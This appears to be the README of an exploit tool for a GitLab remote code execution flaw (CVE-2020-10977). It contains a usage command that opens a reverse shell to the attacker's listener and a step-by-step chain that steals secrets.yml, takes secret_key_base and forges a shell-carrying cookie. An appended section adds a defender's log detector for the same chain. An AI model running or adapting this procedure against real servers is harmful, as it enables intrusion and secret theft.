liath/CVE-2020-10977

GitLab v12.4.0-12.8.1 RCE

Based entirely on https://github.com/dotPY-hax/gitlab_RCE, which did not work for me, and its HTML parsing seemed cumbersome, so I rewrote it in JavaScript.

Usage

Start a reverse shell handler in the usual way, then run this script with:

TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
 TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
 LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
 node gitlab_rce.js

A proxy may be specified with TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080". Burp is particularly useful for debugging with this.

What this does

  1. Checks that the target is up.
  2. If the provided user exists, skips to step 5.
  3. Scans for a username that doesn't already exist.
  4. Creates that user.
  5. Attempts to sign in.
  6. Creates two empty projects.
  7. Creates a new issue ticket in the first project with a malicious link in its body.
  8. Moves the new ticket to the other project, causing GitLab to rewrite the malicious link and copy the file it points to into the uploads directory.
  9. Fetches the target file; in this case we want secrets.yml for the secret_key_base.
  10. Uses secret_key_base to mint an evil cookie carrying our Ruby shell and passes it to GitLab.
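Added here as a defender's example, not code from this repo or from gitlab_RCE: a small detector for the project-create, issue-create, issue-move sequence in steps 6 to 8, run over constructed GitLab production_json.log-style lines. The field names and the controller/action values are assumptions about GitLab's request log, not verified against it.

```javascript
// Constructed sample log lines (not real GitLab output); field names and
// controller/action values are assumed, not verified against GitLab.
const SAMPLE_LOG = [
  '{"time":"2020-11-01T10:00:00Z","username":"alice","controller":"Projects::IssuesController","action":"show"}',
  '{"time":"2020-11-01T10:01:00Z","username":"mallory","controller":"ProjectsController","action":"create"}',
  '{"time":"2020-11-01T10:01:05Z","username":"mallory","controller":"ProjectsController","action":"create"}',
  '{"time":"2020-11-01T10:01:10Z","username":"mallory","controller":"Projects::IssuesController","action":"create"}',
  '{"time":"2020-11-01T10:01:15Z","username":"mallory","controller":"Projects::IssuesController","action":"move"}',
  '{"time":"2020-11-01T11:30:00Z","username":"bob","controller":"Projects::IssuesController","action":"move"}',
];

// The ordered (controller, action) chain that mirrors steps 6-8 above:
// two project creations, one issue creation, one issue move.
const CHAIN = [
  ['ProjectsController', 'create'],
  ['ProjectsController', 'create'],
  ['Projects::IssuesController', 'create'],
  ['Projects::IssuesController', 'move'],
];

// Returns the users who completed the whole chain, in order, within windowMs.
// Unrelated requests in between are ignored; an expired window resets the chain.
function findIssueMoveChains(lines, windowMs = 10 * 60 * 1000) {
  const progress = new Map(); // username -> { idx, start }
  const hits = [];
  for (const line of lines) {
    let ev;
    try { ev = JSON.parse(line); } catch (e) { continue; } // skip malformed lines
    const t = Date.parse(ev.time);
    const state = progress.get(ev.username) || { idx: 0, start: t };
    if (t - state.start > windowMs) { state.idx = 0; state.start = t; }
    const [ctrl, act] = CHAIN[state.idx];
    if (ev.controller === ctrl && ev.action === act) {
      if (state.idx === 0) state.start = t; // chain starts at the first project create
      state.idx += 1;
      if (state.idx === CHAIN.length) {
        hits.push({ username: ev.username, completedAt: ev.time });
        state.idx = 0;
      }
    }
    progress.set(ev.username, state);
  }
  return hits;
}

console.log(findIssueMoveChains(SAMPLE_LOG));
```

On the sample above only "mallory" is flagged; "bob" moves an issue without the preceding creates, and "alice" only views one.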
